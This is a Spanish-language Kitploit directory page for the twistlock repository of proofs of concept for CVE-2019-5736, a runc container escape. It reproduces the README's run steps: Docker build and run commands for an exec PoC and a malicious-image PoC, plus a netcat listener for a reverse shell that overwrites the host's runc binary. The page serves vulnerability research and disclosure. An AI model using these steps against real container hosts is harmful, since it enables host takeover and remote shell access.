Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RunC-CVE-2019-5736 — CVE-2019-5736 PoCs | Kitploit
Herramientas/GitHubGitHub/twistlock/runc-cve-2019-5736
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónRed TeamingDesarrollo de PayloadsEscape de Contenedores
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

CVE-2019-5736 PoCs

Ver Repositorio
86342hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

RunC-CVE-2019-5736

Dos PoCs para CVE-2019-5736. Consulte Twistlock Labs para una explicación de CVE-2019-5736 y los PoCs.

El PoC de imagen maliciosa se basa en gran medida en el PoC de q3k, por lo que todo el crédito es para él.

Ejecutando los PoCs

Tenga en cuenta que ejecutar los PoCs sobrescribirá el binario runc en el host. Se recomienda que cree una copia de su binario runc (comúnmente en /usr/sbin/runc) antes de ejecutar uno de los PoCs.

Clone el repositorio:

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

PoC de exec

Sobrescribe runc con un programa simple que imprime una cadena.

Ejecutando el PoC de exec:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

PoC de Imagen Maliciosa

Sobrescribe runc con un script bash de reverse shell simple que se conecta a localhost:2345.

Escuche para el reverse shell:

root@kitploit:~
$ nc -nvlp 2345

Desde un shell diferente, ejecute el PoC de imagen maliciosa:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
Descargar herramienta